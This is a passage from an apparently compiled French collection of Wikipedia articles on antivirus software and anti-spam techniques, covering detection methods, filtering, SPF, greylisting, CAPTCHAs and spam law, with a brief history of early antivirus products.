indépendamment et avant tous contrôles traditionnels tels ceux dérivés de DAC.

Normes et certifications A détailler : de l'Orange Book aux CC LSPP. 195

6-Logiciel de sécurité informatique 196

6.1-Types

Logiciel antivirus

Cet article ne cite pas suffisamment ses sources (septembre 2008). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Pour les articles homonymes, voir AV. Les antivirus sont des logiciels conçus pour identifier, neutraliser et éliminer des logiciels malveillants (dont les virus ne sont qu'un exemple). Ceux-ci peuvent se baser sur l'exploitation de failles de sécurité, mais il peut également s'agir de programmes modifiant ou supprimant des fichiers, que ce soit des documents de l'utilisateur de l'ordinateur infecté, ou des fichiers nécessaires au bon fonctionnement de l'ordinateur. (Cf. Virus pour plus d'information sur les menaces traquées par les antivirus)

Fonctionnement Un antivirus vérifie les fichiers et courriers électroniques, les secteurs de boot (pour détecter les virus de boot), mais aussi la mémoire vive de l'ordinateur, les médias amovibles (clefs USB, CD, DVD, etc.), les données qui transitent sur les éventuels réseaux (dont internet), etc. Différentes méthodes sont possibles : • Les principaux antivirus du marché se concentrent sur des fichiers de signatures et comparent alors la signature virale du virus aux codes à vérifier. • La méthode heuristique est la méthode la plus puissante, tendant à découvrir un code malveillant par son comportement. Elle essaie de le détecter en analysant le code d'un programme inconnu. Parfois de fausses alertes peuvent être provoquées. •L’analyse de forme repose sur du filtrage basé entre des règles regexp ou autres, mises dans un fichier junk. Cette dernière méthode peut être très efficace pour les serveurs de courriels supportant les regexp type postfix puisqu'elle ne repose pas sur un fichier de signatures. Les antivirus peuvent balayer le contenu d'un disque dur, mais également la mémoire de l'ordinateur. Pour les plus modernes, ils agissent en amont de la machine en scrutant les échanges de fichiers avec l'extérieur, aussi bien en flux montant que descendant. Ainsi, les courriels sont examinés, mais aussi les fichiers copiés sur ou à partir de supports amovibles tels que cédéroms, disquettes, connexions réseau, clefs USB… Logiciel antivirus 197

Approches On distingue plusieurs types d’antivirus selon leur fonctionnement. La première méthode est celle du dictionnaire.

Dictionnaire Les créateurs d’antivirus ayant préalablement identifié et enregistré des informations sur le virus, comme le ferait un dictionnaire, l’antivirus peut ainsi détecter et localiser la présence d’un virus. Lorsque cela se produit, l'antivirus dispose de trois options, il peut : 1.1.tenter de réparer les fichiers endommagés en éliminant le virus ; 2. mettre les dossiers en quarantaine afin qu’ils ne puissent être accessibles aux autres dossiers ni se répandre et qu'ils puissent éventuellement être réparés ultérieurement ; 3.3.supprimer les fichiers contaminés. Afin de maximiser le rendement de l'antivirus, il est essentiel d’effectuer de fréquentes mises à jour en téléchargeant des versions plus récentes. Des internautes consciencieux et possédant de bonnes connaissances en informatique peuvent identifier eux-mêmes des virus et envoyer leurs informations aux créateurs de logiciels antivirus afin que leur base de données soit mise à jour. Généralement, les antivirus examinent chaque fichier lorsqu'il est créé, ouvert, fermé ou lu. De cette manière, les virus peuvent être identifiés immédiatement. Il est possible de programmer le système d’administration pour qu’il effectue régulièrement un examen de l'ensemble des fichiers sur l'espace de stockage (disque dur, etc). Même si les logiciels antivirus sont très performants et régulièrement mis à jour, les créateurs de virus font tout aussi souvent preuve d'inventivité. En particulier, les virus « oligomorphiques », « polymorphiques » et plus récemment, « métamorphiques », sont plus difficiles à détecter.

Liste blanche La « liste blanche » est une technique de plus en plus utilisée pour lutter contre les logiciels malveillants. Au lieu de rechercher les logiciels connus comme malveillants, on empêche l'exécution de tout programme à l'exception de ceux qui sont considérés comme fiables par l'administrateur système. En adoptant cette méthode de blocage par défaut, on évite les problèmes inhérents à la mise à jour du fichier de signatures virales. De plus, elle permet d'empêcher l'exécution de programmes indésirables. Étant donné que les entreprises modernes possèdent de nombreuses applications considérées comme fiables, l'efficacité de cette technique dépend de la capacité de l'administrateur à établir et mettre à jour la liste blanche. Cette tâche peut être facilitée par l'utilisation d'outils d'automatisation des processus d'inventaire et de maintenance.

Comportements suspects Une autre approche pour localiser les virus consiste à détecter les comportements suspects des programmes. Par exemple, si un programme tente d’écrire des données sur un programme exécuté, l’antivirus détectera ce comportement suspect et en avisera l’usager qui lui indiquera les mesures à suivre. Contrairement à l’approche précédente, la méthode du comportement suspect permet d’identifier des virus très récents qui ne seraient pas encore connus dans le dictionnaire de l'antivirus. Toutefois, le fait que les usagers soient constamment avertis de fausses alertes peuvent les rendre insensibles aux véritables menaces. Si les usagers répondent « Accepter » à toutes ces alertes, l’antivirus ne leur procurera aucune protection supplémentaire. Ce problème s’est aggravé depuis 1997, puisque plusieurs programmes inoffensifs ont modifié certains fichiers exécutables sans observer ces fausses alertes. C’est pourquoi, les antivirus les plus modernes utilisent de moins en moins cette méthode. Logiciel antivirus 198

Autres approches L’analyse heuristique est utilisée par quelques antivirus. Par exemple, l’antivirus peut analyser le début de chaque code de toutes les nouvelles applications avant de transférer le contrôle à l’usager. Si le programme semble être un virus, alors l’usager en sera averti. Toutefois, cette méthode peut également mener à de fausses alertes. La méthode heuristique permet de détecter des variantes de virus et, en communiquant automatiquement les résultats de l'analyse à l'éditeur, celui-ci peut en vérifier la justesse et mettre à jour sa base de définitions virales. La méthode du bac à sable (sandbox en anglais) consiste à émuler le système d’exploitation et à exécuter le fichier lors de cette simulation. Une fois que le programme prend fin, les logiciels analysent le résultat du bac à sable afin de détecter les changements qui pourraient contenir des virus. En raison des problèmes de performance, ce type de détection a lieu habituellement pendant le balayage sur demande. Cette méthode peut échouer puisque les virus peuvent s’avérer non déterministes et résulter de différentes actions ou même peut-être d’aucune action lorsque exécuté. Il est impossible de le détecter à partir d’une seule exécution.

Historique Plusieurs sociétés revendiquent le titre de créateur du premier logiciel antivirus. La première annonce publique d’une neutralisation d’un virus pour PC a été faite par European Bernt Fix (ou Bernd) au début de l’année 1987, sur le virus Vienna. Suite à ce virus, plusieurs autres virus ont fait surface comme par exemple Ping Pong, Lehigh et Surviv-3, aussi connu sous le nom de Jérusalem. Depuis 1988, plusieurs sociétés ayant pour objectif d’approfondir les recherches dans le domaine des logiciels antivirus se sont regroupées. Les premières percées en matière d'antivirus ont eu lieu en mars 1988 avec la sortie de Den Zuk, créé par l'Indonésien Denny Yanuar Ramdhani. Den Zuk pouvait neutraliser le virus Brain. En avril 1988, le forum Virus-L a été créé sur Usenet, et le milieu de l'année 1988 a vu la conception d'un appareil de recherche capable de détecter les virus et les Trojans qui étaient connus du public. En automne 1988 est paru le logiciel antivirus Dr. Solomon's Anti-Virus Toolkit conçu par Briton Alan Solomon. À la fin du mois de décembre 1990, le marché en est venu au point d'offrir au consommateur 19 différents produits reliés aux antivirus, parmi ceux-ci, Norton Antivirus et VirusScan de McAfee. Peter Tippett a beaucoup participé à l'émergent domaine de la détection de virus informatiques. Il était urgentologue de profession et possédait également sa société de logiciels. Il a lu un article à propos du virus Lehigh, qui fut le premier à être développé, mais c’est en fait sur Lehigh lui-même que Tippett s’est le plus renseigné. Il s’est posé la question s’il y avait des caractéristiques similaires entre ces virus et ceux qui attaquent les humains. D’un point de vue épidémique, il a été en mesure de déterminer comment ces virus affectaient les processeurs à même l’ordinateur (le secteur de démarrage était visé par le virus Brain, les fichiers .com par le virus Lehigh, tandis que le virus Jérusalem s'attaquait à la fois aux fichiers .com et .exe). La société de Tippett, Certus International Corp. s’est donc impliqué dans la création de logiciels antivirus. Il a vendu la société en 1992 à Symantec Corp. et Tippett s'est joint à eux, en implantant le logiciel conçu au nom de Symantec, AntiVirus Norton.

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Logiciel_antivirus& action=edit Lutte anti-spam 199 Lutte anti-spam

Cet article ne cite pas suffisamment ses sources (novembre 2009). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

La lutte antipourriel (anti-spam ou anti-spamming, ou antipollupostage) est un ensemble de comportements, de systèmes et de moyens techniques et juridiques permettant de combattre le pourriel (ou « spam », courriers électroniques publicitaires non sollicités).

L'intérêt de la lutte anti-spam Autour de l'année 2000, le spam pouvait sembler inoffensif. En effet, la plupart des spammeurs utilisaient ce moyen afin de promouvoir des produits en tous genres (produits pharmaceutiques, faux diplômes, logiciels piratés, matériel pornographique, etc.). Or, avec le volume sans cesse croissant de spams transitant dans l’Internet (plus de 90 % des messages), et avec l’arrivée de types de spams plus pervers, tels l’hameçonnage, où la sécurité financière d’un individu est mise en péril, il est devenu très important de se prémunir contre cette nuisance. A priori, les « spammeurs » peuvent sembler assez « sots » de passer leur temps à envoyer des millions de courriels chaque jour, jour après jour. Il n'en est rien. L'industrie du spam est très florissante, et il est facile de se faire beaucoup d'argent en peu de temps : le coût d'un courriel est pratiquement nul et un faible, même très faible, taux de retour suffit à assurer la rentabilité du projet.

Rester anonyme Pour éviter de recevoir du spam, les internautes font souvent figurer leurs adresses email d'une manière masquée lorsqu'elle doit apparaitre dans un site web ou dans Usenet. Par exemple : • [email protected] pour [email protected]. • Jean chez exemple point fr pour [email protected] • Jean[at]exemple.fr pour [email protected] (l'arrobase se prononçant souvent « at »). Mais cette méthode est aussi déconseillée car rien n'interdit au spammeur de faire un traitement d'enlèvement des drapeaux les plus communs (NOSPAM, AT, chez etc.). Une autre méthode consiste à encoder son adresse avec un algorithme quelconque (par exemple, remplacer chaque lettre par la suivante dans l'alphabet), et d'insérer dans la page une fonction javascript qui décode. Ainsi rien ne change pour l'internaute qui peut toujours cliquer sur le lien « envoyer un mail », mais l'adresse n'apparaît pas en clair dans la page. Jusqu'ici, les arroseurs n'exécutent pas le code javascript avant de chercher les adresses (trop long, plus complexe, etc.). Une autre méthode consiste à encoder son adresse en caractères Hexadécimaux par exemple : &X02&X36... Cela ne sera pas détectable par les robots qui parcourent les pages web parce qu'ils n'ont pas de moteur de rendu (comme un navigateur web internet explorer, firefox, etc. peut le faire), ils lisent juste des caractères alphanumériques. Il existe des petits logiciel pour faire cela, ou même des codes PHP. L'avantage de cette méthode est que c'est le navigateur qui décode, pas besoin de code javascript. Enfin, on peut choisir de communiquer son adresse par une image, ainsi on ne pourra pas la récupérer « facilement » par un robot. Pourvu que cette image soit étirée et maquillée afin qu'un logiciel de reconnaissance de caractères (OCR) ne puisse reconstituer votre adresse (sur le même principe qu'un captcha). Cette dernière méthode est considérée comme la plus sûre, bien qu'elle ait pour inconvénient majeur de la rendre très difficile à lire pour des Lutte anti-spam 200

personnes ayant un handicap visuel. La méthode la plus sûre est sans doute de ne pas divulguer son adresse personnelle sur le Net, lieu public par excellence, mais de la communiquer seulement à vos amis et à vos proches. Et encore, les serveurs de messagerie peuvent parfois être hackés (autre méthode pour les arroseurs pour collecter des adresses).

Avoir un système à jour Les spammeurs font en outre preuve d'ingéniosité lorsqu'il s'agit de trouver de nouvelles techniques de spam, et de déjouer les systèmes anti-spams existants. En fait, les spammeurs et leurs adversaires rivalisent d'astuce pour déjouer les techniques de l'autre partie, d'où l'importance de garder son système de protection à jour : plus souvent le système est mis à jour, plus il est efficace, et le nombre de faux-négatifs s'en trouve diminué. Plusieurs techniques de lutte contre le spam sont possibles et peuvent être cumulées : filtrage par mots-clés ou par auteur, analyse statistique (méthode bayésienne), listes blanches (désignation de personnes ou de machines autorisées à publier dans certains lieux), listes noires (désignation de personnes ou de machines auxquelles il est interdit de publier dans certains lieux), interrogation en temps réel de serveurs spécialisés dans la lutte contre le spam. Ces techniques de lutte, tout comme les logiciels antivirus, doivent s'adapter en permanence car de nouveaux types de spams réussissent à contourner ces défenses.

Méthodes d'analyse et de filtrage à la réception Bien que souvent différentes en matière d'utilisation, d'implantation et de coût, les solutions de lutte anti-spam par filtrage mettent sensiblement les mêmes techniques pour distinguer le spam du courrier légitime. Ces techniques peuvent être mises en œuvre soit au niveau des fournisseurs de service Internet qui protègent leur messagerie, soit au niveau des utilisateurs par des outils appropriés ([filtres anti-spams). Le filtre est souvent implanté au niveau du MTA (Mail Transfer Agent) récepteur du courriel. Ces techniques peuvent être soit préventives (marquage du courrier pour indiquer qu'il s'agit de courriers indésirables) soit curatives (blocage, voire renvoi des messages incriminés vers l'expéditeur). Cette dernière comporte des inconvénients puisque le destinataire doit pouvoir être maître des courriers qu'il souhaite recevoir. De plus renvoyer un message peut empirer la situation en occupant un peu plus le réseau, avec de fortes probabilités que l'auteur du spam ait maquillé sa véritable adresse ou utilisé l'adresse d'un tiers (tout à fait innocent) comme adresse de retour. De plus, cette façon de faire indique au spammeur que l'adresse visée est bien active, ce qui augmente bien souvent les envois. Ces outils peuvent être divisés en deux groupes : le filtrage d'enveloppe, et le filtrage de contenu. L'en-tête du courriel constitue les informations de base de ce dernier : expéditeur, destinataire, copie conforme, copie conforme invisible, date d'envoi, serveur source, sujet. Le contenu du message est le message en tant que tel : texte, images, code HTML, etc.

Filtrage d'enveloppe Le taux d'efficacité du filtrage d'enveloppe est d'environ 50 %[réf. nécessaire]. Ce type de filtrage s'applique uniquement à l'en-tête du message, qui contient souvent assez d'informations pour pouvoir distinguer un spam. Il ne s'attache pas au contenu du courriel. Cette technique présente l'avantage de pouvoir bloquer les courriels avant même que leur corps ne soit envoyé, ce qui diminue grandement le trafic sur la passerelle SMTP (puisque le corps du message est envoyé après que l'en-tête a été reçu et accepté). De plus, le taux de faux positifs dans ce type de filtrage est quasiment nul : lorsqu'un filtre d'enveloppe a identifié un courriel comme du spam, il se trompe rarement. Lutte anti-spam 201

Filtrage de contenu Les filtres de contenu analysent le contenu des messages et détectent les spams qui ont réussi à passer à travers le filtre d'enveloppe. Le filtrage de contenu est un peu plus sensible que le filtre d'enveloppe : après tout, les informations véhiculées à travers le message sont subjectives, et ce qui peut paraître un spam selon le filtre de contenu peut être un courriel tout à fait légitime (c'est ce que l'on appelle un faux positif), et l'inverse est aussi vrai (faux-négatif). Le filtrage de contenu peut se développer en plusieurs couches. Par exemple, le filtre peut faire appel à un logiciel antivirus, à un désarchiveur pour analyser les fichiers archivés s'il y a lieu, à un analyseur bayésien (voir plus bas), et ainsi de suite. Exemple de filtre de contenu : SpamAssassin.

Filtrage bayesien Article détaillé : filtrage bayésien du spam. Le filtrage bayésien du spam (du mathématicien Thomas Bayes) est un système fondé sur l'apprentissage d'une grande quantité de spams et courriels légitimes afin de déterminer si un courriel est légitime ou non. Afin de bien fonctionner, le corpus de spam et le corpus de ham (courriels légitimes) doivent contenir idéalement plusieurs milliers de « spécimens ». Le message à identifier est découpé en morceaux (souvent réduits à de simples mots) qui sont comparés à tout le corpus de courriels (spams ou non), pour déterminer la fréquence des différents morceaux dans les deux catégories. Une formule probabiliste est utilisée afin de calculer la probabilité que le message soit un spam ou non. Lorsque la probabilité est suffisamment élevée, le système bayésien catégorise le message comme du spam. Sinon, il le laisse passer. Le seuil de probabilité peut être défini par l'administrateur système : il s'agit de trouver le seuil le plus efficace. La méthode bayésienne sert également à d'autres classifications automatiques du courrier, en particulier dans Lotus Notes.

Filtrage par mots-clés ou adresses Cette méthode est très limitée car elle se base sur le rejet ou le tri du courrier en fonction de règles de vocabulaire préalablement établies, définissant des mots comme interdits. Certains mots-clés revenant souvent dans les spams, tels que « sexe », « viagra » ou « money » pourront servir de base pour la constitution de ces règles. De même on pourra décider de bloquer tous les messages en provenance d'un expéditeur précis, d'un domaine spécifique, voire d'un pays entier. Cette méthode engendre de fortes probabilités d'erreur et s'avère peu efficace lorsque les spammeurs maquillent les mots utilisés (« vi@gr@ », « s3x », etc.). Il convient alors d'utiliser les expressions rationnelles.

Filtrage par expressions rationnelles Une expression rationnelle (appelée souvent « expression régulière » en informatique) est un motif que l'on peut appliquer à une chaîne afin de voir si ladite chaîne correspond au motif (par exemple : un chiffre suivi de trois lettres suivi d'un d'espace, puis d'un chiffre pourrait s'écrire de cette manière : /^[0-9]{1}[A-Za-z]{3} [0-9]{1}$/). En utilisant des expressions rationnelles afin de trouver des variations de mots « sensibles », on augmente les chances de découvrir des spams. Par exemple, si un spammeur tente de déjouer un filtre de mots-clés en utilisant le mot « viiaaagraa », l'expression rationnelle /^vi+a+gra+$/i (un « v » suivi d'un ou plusieurs « i » suivi d'un ou plusieurs « a », suivi d'un « g », d'un « r », et de un ou plusieurs « a », sans se soucier de la casse) permet de retrouver le mot. Évidemment, cet exemple est très simple, mais les expressions rationnelles complexes permettent de détecter des expressions et des déclinaisons beaucoup plus subtiles et sophistiquées. Lutte anti-spam 202

Une limite de l'utilisation d'expressions rationnelles est illustré dans le problème de Scunthorpe, qui produit de faux positifs.

Filtrage heuristique Le filtrage heuristiques teste le contenu du message (par exemple, quelle proportion de code HTML, d'images, de références à la pornographie, à l'acquisition facile d'argent contient-il par rapport au reste du message ? ; le sujet est-il vide ? L'identificateur du message (Message-ID) contient-il des signes « dollar » (souvent utilisé par les logiciels d'envoi de spams)). Chaque test donne un nombre de point (plus le total est bas, mieux c'est ; moins le message est considéré comme du spam). Le seuil de point reste arbitraire et défini par l'administrateur système qui doit trouver le score donnant le meilleur équilibre entre le nombre de faux positifs et de faux-négatifs[2].

Analyse de virus et de pièces jointes Les courriels possèdent souvent des pièces jointes, et celles-ci peuvent contenir des virus. Il est donc important d'avoir, dans le processus de tri des messages, un antivirus. Souvent, les filtres de contenu en ont un intégré. Par exemple, il n'est pas rare de voir SpamAssassin et ClamAV ensemble.

Les images Les images sont une des difficultés majeures qu'ont à affronter les filtres de contenu. En effet, il est pratiquement impossible de déterminer si l'image est légitime ou non (souvent, les spammeurs utiliseront des images afin de camoufler du texte). Une des techniques pour déterminer, à partir d'une image, si le courriel est légitime ou non, est de regarder le nombre d'images dans le courriel et de voir comment elles sont placées dans le message. Cela peut être un bon indice de la nature du message. Par ailleurs, il est possible de générer une somme de contrôle sur l'image et de la comparer avec d'autres sommes de contrôle disponibles sur Internet (un peu à la manière des RBL). Cela permettra au système de vérifier si l'image a déjà été utilisée dans un spam et de classer le courriel en conséquence. (voir aussi Spam image)

Intégrité SMTP Les courriels transitant grâce au protocole SMTP, une grande quantité de normes ont été définies pour ce protocole (RFC2821 [3]), que les spammeurs omettent souvent de respecter. Par exemple, le nom serveur qui envoie le courriel doit être, préférablement, pleinement qualifié (FQDN) (exemple : mail.domaine.com), règle que les spammeurs ne suivent pas toujours. De même, certains spammeurs usurpent le serveur d'envoi en faisant croire au filtre que le message vient d'un serveur connu (127.0.0.1, par exemple). Un bon filtre est capable de détecter ces usurpations. Autre exemple : certains spams n'émettent pas de bannière de présentation (HELO), ce qui est pourtant exigé dans les normes SMTP. Ces tests sont laissés à la discrétion du filtre et de l'administrateur système, qui décide quelles sont les règles pertinentes pour son serveur de messagerie. Les règles d'intégrité SMTP sont souvent très efficaces, car, pour les spammeurs, elles agissent comme inhibiteurs de performance (elles ralentissent les envois). Or, un spammeur a intérêt à être le plus performant possible et il peut être très payant pour lui de passer outre ces règles.

RPD (« Recurrent Pattern Detection ») La technologie RPD, Recurrent Pattern Detection ou « Détection des signatures récurrentes » en français, est une technologie qui ne se base non pas sur le contenu des courriels, mais sur leur taux de propagation sur l’ensemble du réseau Internet. Grâce à des serveurs basés un peu partout dans le monde, il est en effet possible de déterminer très rapidement si un courriel est un spam en vérifiant de manière centralisée le nombre de fois où ce même courriel aura été envoyé sur la toile. Si par exemple le même courriel a été envoyé en 100 000 exemplaires en même temps, il s’agira forcément d’un spam. Lutte anti-spam 203

Cette technologie offre un taux de capture de plus de 98 %[réf. nécessaire] des spams pour 1 faux positif sur 1 million}[réf. nécessaire].

Méthodes consistant à rendre l'envoi du spam difficile

Filtrage de serveur expéditeur Ce type de filtrage permet de bannir des adresses courriel, des domaines, ou des serveurs. Ainsi, tout message provenant d'éléments de la liste noire sera bloqué par le système anti-spam. Ces éléments de liste sont très souvent définis par un administrateur système qui, par expérience, est en mesure de déterminer les sources les plus communes de spam. Cette technique a pour caractéristique de n'être pas limitée qu'au spam dans le sens pur et dur du terme : elle peut également bloquer des sources de courriel légitime, si l'administrateur système les considère comme nuisible. Évidemment, ce type de filtrage est hautement subjectif et dépend du bon vouloir et de l'assiduité de la personne créant la liste.

RBL Les Realtime Blackhole List (RBL) ont comme mandat de fournir une liste de serveurs réputés comme grands envoyeurs de spams, et de lister les grands spammeurs. Il s'agit en fait d'une grande liste noire généralisée. Le principe d'utilisation est simple : lorsqu'un filtre reçoit un courriel, il vérifie si le serveur d'envoi est contenu dans un RBL. Si oui, le courriel est catégorisé comme spam. Les RBL qu'un filtre utilise comme sources de serveurs sont habituellement déterminés par l'administrateur système. Cette méthode contient donc son lot de controverse, car certains RBL sont réputés pour être plus efficaces que d'autres. Leur choix influence donc directement l'efficacité du système antispam. De plus, certains RBL ont des règles plus souples que d'autres quant à l'ajout d'un serveur dans leur liste, compliquant encore plus la situation. Pour pallier ce problème on peut consulter plusieurs RBL et ne bloquer une source que si elle est présente dans deux listes.

SPF (« Sender Policy Framework ») SPF (Sender Policy Framework) se base sur la zone DNS d'un domaine pour fonctionner. Le détenteur d'un domaine ajoute, dans la zone DNS de ce domaine, un enregistrement de type TXT qui indique quelles sont les machines autorisées ou non à envoyer du courriel pour le domaine. Ainsi, si mail.domainea.com est le seul serveur autorisé à envoyer du courriel pour domainea.com, ce sera spécifié dans l'enregistrement TXT. Pour fonctionner correctement, le support SPF doit être activé sur le filtre antispam. Le système vérifie que le serveur envoyant le courriel est bien dans la liste des serveurs autorisés. Sinon, il s'agit d'un spam.

Liste grise (Greylisting) Article détaillé : Greylisting. La liste grise est un terme utilisé pour décrire une technologie antispam (antispam) particulièrement efficace, qui fonctionne selon ce principe : selon les normes définies dans le RFC 2821, lorsqu’un serveur de réception de courriel (dans ce cas-ci, le serveur qui reçoit le courriel, sur lequel le filtre de courriel est activé) ne peut traiter la réception d’un message (par exemple, s’il est indisponible), il doit retourner un code d’erreur 421. Ce code d’erreur indique au serveur qui envoie le message d’attendre et de réessayer l’envoi un peu plus tard. Ce délai est défini dans la configuration du serveur expéditeur du message (ou Mail Transfert Agent). Tout MTA légitime respecte cette règle. Les MTA non légitimes (utilisés par les spammeurs) ne le font pas car cela leur fait perdre de l’efficacité : le MTA continue donc son envoi de courriels (il passe au prochain destinataire) sans attendre pour ré-envoyer le courriel actuel. Lutte anti-spam 204

Les experts de la sécurité du courriel ont donc envisagé une méthode exploitant cette particularité : la liste grise. Celle-ci fonctionne avec une base de données. Chaque enregistrement de la base de données constitue un triplet composé de l’adresse IP du serveur qui envoie le courriel, de l’adresse courriel de l’expéditeur, et de l’adresse courriel du destinataire, formant ainsi une clé unique. Est aussi stockée dans la base la date de la première connexion du triplet au serveur. Lorsqu’un message est reçu par le serveur de courriel du destinataire, ce dernier vérifie dans sa base l’existence du triplet. • Si le triplet n’est pas dans sa base de données, il l’ajoute avec la date actuelle. Il renvoie ensuite le code d’erreur 421, indiquant au serveur qu’il devra ré-envoyer le message. • Si le triplet est déjà dans la base de données, le serveur vérifie le délai entre la date courante et celle stockée dans la base (la date de la première connexion). Si le délai est supérieur ou égal à un délai prédéfini (par exemple, 5 minutes), le message est accepté. Sinon, le serveur retourne un numéro d’erreur 421. Après un certain temps (défini également dans l’enregistrement), l’enregistrement devient inactif et le serveur doit ré-envoyer un 421 (on peut supposer que l’enregistrement est détruit). Ainsi, lorsque le MTA envoyeur reçoit le 421, s’il est légitime, il attendra avant de ré-envoyer le message. Sinon, il n’attendra pas et ne le ré-enverra pas. Cette technique permettait d’atteindre des taux d’efficacité très élevés, de l’ordre de 99 %[4] quand elle a été proposée en 2003, puisque la très grande majorité des spammeurs préfère sacrifier un courriel plutôt que d’attendre et ainsi, diminuer leur performance. Actuellement l’efficacité est moins importante (~80-90 %) à cause de l’augmentation de l’utilisation des webmails (des vrais serveurs de messagerie), par les spammeurs, pour distribuer les spams. Cette méthode a également un effet secondaire inattendu : elle est relativement efficace pour supprimer les vers utilisant la messagerie pour se propager. C’est une qualité partagée par les méthodes de filtrage dite « protocolaires », telles la limitation de cadences, les RBL et les listes de réputation. Cette technique a aussi l’avantage d’être très facile à mettre en place. Toutefois, un administrateur système doit se demander s’il est prêt à accepter des délais (même si ce n’est qu’une seule fois) dans la réception des courriels.

Captcha Dans les méthodes à base de Captcha, l'expéditeur d'un courriel doit prouver son « humanité » en recopiant un mot affiché sous forme d'une image, un captcha. Un robot spammeur ne saura pas recopier ce mot alors qu'un humain pourra le faire très facilement et sera alors autorisé une fois pour toutes à écrire à son correspondant. Les sociétés distribuant des solutions à base de captcha proclament « une solution qui élimine 100 % des spams ». L'intérêt de cette solution est contesté par des organismes officiels chargés du développement et la définition des normes d'Internet. L'ASRG (groupe de travail sur le spam de l'IRTF - Internet Research Task Force) attribue plutôt un niveau d'efficacité moyen pour un haut niveau de nuisance et considère que cette méthode présente les mêmes inconvénients des méthodes dites « Challenge-Réponse »[5]. Le consortium W3C (organisme de définition des normes WWW) ainsi que l'American Conseil for the Blind soulèvent les problèmes d'accessibilité pour les personnes avec déficiences visuelles[6],[7]. En France, la loi no 2005-102 du 11 février 2005 pour l’égalité des droits et des chances, la participation et la citoyenneté des personnes handicapées, fait de l’accessibilité une exigence pour tous les services de communication publique en ligne de l’État, des collectivités territoriales et des établissements publics qui en dépendent. Ainsi, le Référentiel général d'accessibilité des administrations indique à propos des captchas graphiques qu'« il est nécessaire d'étudier si le problème amenant à leur utilisation ne peut être résolu autrement (détection automatique des spams, test heuristique) » et, le cas échéant, impose la présence d'alternatives en application de la norme d'accessibilité WCAG2.0[8]. Lutte anti-spam 205

Priorité des enregistrements MX Lors de la définition de la zone DNS pour un domaine, il est possible de définir un enregistrement MX (Mail EXchanger), qui spécifie quel est le serveur responsable de la gestion du courriel pour ledit domaine. Il est possible de définir plusieurs enregistrements MX, de sorte que si l'un tombe, un autre pourra prendre le relais. À chaque enregistrement est associé un nombre indiquant une priorité (exemple, 10, 20, 30, 100, 200, etc.). Les MTA sont tenus d'envoyer leur courrier au serveur le plus prioritaire (celui qui a le nombre le plus bas). De fait, il est tout à fait normal que le serveur ayant la plus haute priorité soit le plus sollicité. Ainsi, c'est souvent lui qui sera le plus sécurisé (les autres le seront souvent moins). Les spammeurs ont vite fait de découvrir cette situation et il n'est pas rare que les spams soient envoyés au serveur ayant la plus faible priorité (le nombre le plus élevé). Ces serveurs étant souvent moins protégés, la probabilité qu'un spam passe est donc plus élevée. Pour contrer ce problème, il est fortement conseillé de protéger tous ses MX de la même manière. De plus, il est possible de déjouer les spammeurs en spécifiant dans le MX le plus élevé un serveur factice. Plus spécifiquement, ce serveur pourrait rejeter toutes les connexions, et donc, toutes les tentatives de spams se rendant au serveur seraient déjouées.

Rendre les courriels payants Mettre un prix sur l'envoi de courriels, symbolique pour les envois légitimes mais dissuasif pour les envois massifs (à 2 centimes d'euros par courrier, celui-ci reste toutefois du même ordre de coût pour l'expéditeur qu'une publicité radio ; or elle peut être « bien mieux ciblée » selon l'endroit où a été récoltée l'adresse). Et à 20 centimes d'euros il sera nécessaire de mettre une franchise sinon c'est l'accès à l'envoi de courrier pour le particulier au budget le plus serré qui commence à s'estomper. En 2005, l'homme politique Alain Lamassoure (UMP), alors député européen, avait proposé de taxer les courriels (0,00001 centime) pour financer l'Union européenne[9]. Il s'agissait d'un malentendu[10], qui a donné lieu en 2011 à un canular informatique sur le même thème[11].

Modération Dans les forums Internet et Usenet, ainsi que sur les listes de diffusion, on a souvent recours à la modération : une personne de confiance (« modérateur ») lit les messages dont la publication est proposée, et refuse éventuellement de les diffuser (modération a priori) ; ou bien cette personne lit les messages qui ont déjà été diffusés, et efface ceux qui lui semblent hors de propos (modération a posteriori). Comme cette méthode nécessite des moyens humains importants, et que de plus les modérateurs sont souvent accusés (de censure) à outrance, il existe aussi une modération par robot (généralement appelée « robot-modération ») : n'importe qui peut publier un message par l'intermédiaire du robot, même si cet article est dépourvu d'intérêt (et même s'il constitue effectivement un pollupostage), mais le robot ne laisse passer le message que s'il répond à un critère simple et connu de tous, comme la présence d'un certain mot dans son titre. Cette protection est surtout efficace contre les robots qui émettent automatiquement des messages identiques dans des dizaines de forums, et qui n'ont pas été programmés pour produire des messages conformes aux exigences spécifiques de tel ou tel forum. Lutte anti-spam 206

Lutte judiciaire et législative En France, le spam est réglementé, d'autant plus qu'il implique la possession, la conservation (et souvent le commerce) de listes d'adresses électroniques récupérées automatiquement (dans des forums de discussion, des sites Web), ce en contradiction avec la loi informatique et libertés. Théoriquement, une loi impose l'accord des destinataires pour tout type d'envois comportant le nom d'une personne physique. Dans la pratique, les entreprises pratiquant ce genre de commerce ont des réponses « types » pour se déresponsabiliser : soit l'utilisateur a cliqué par erreur sur un bouton, soit il n'a pas répondu comme il le fallait a une question, voire, la liste a été louée à X ou Y. Dans la loi française, le fait d'envoyer du spam vers une personne morale (une société par exemple) n'est pas condamnable. Aux États-Unis, le pollupostage est réglementé depuis 2003 par un texte de loi appelé le « CAN-SPAM Act ». Elle autorise les spams, à condition que le sujet du courriel soit descriptif, que l'adresse d'expédition soit valide et qu'une méthode de désinscription (hyperlien) soit fournie. Dans de nombreux pays, aucune réglementation spécifique au spam n'existe. Quelques poursuites judiciaires ont été amorcées en utilisant des lois existantes : • si on utilise une fausse adresse de retour et cette adresse appartient à quelqu'un d'autre, cela peut être considéré comme une usurpation d'identité ; • si on promeut une action de compagnie en bourse, on peut être accusé de pratiquer le courtage boursier sans licence ; • si on continue à utiliser un serveur après que son propriétaire ait demandé à la cour une injonction de désistement, c'est du vol de temps de processeur d'ordinateur qui peut être interdit par des lois conçues pour arrêter d'autres attaques contre les systèmes informatiques ; •• si on fait la promotion de produits médicaux, on risque d'être trouvé coupable de pratique de pharmacien, médecin ou infirmière sans licence ; •• l'envoi de publicités pornographiques vers des boîtes à lettres 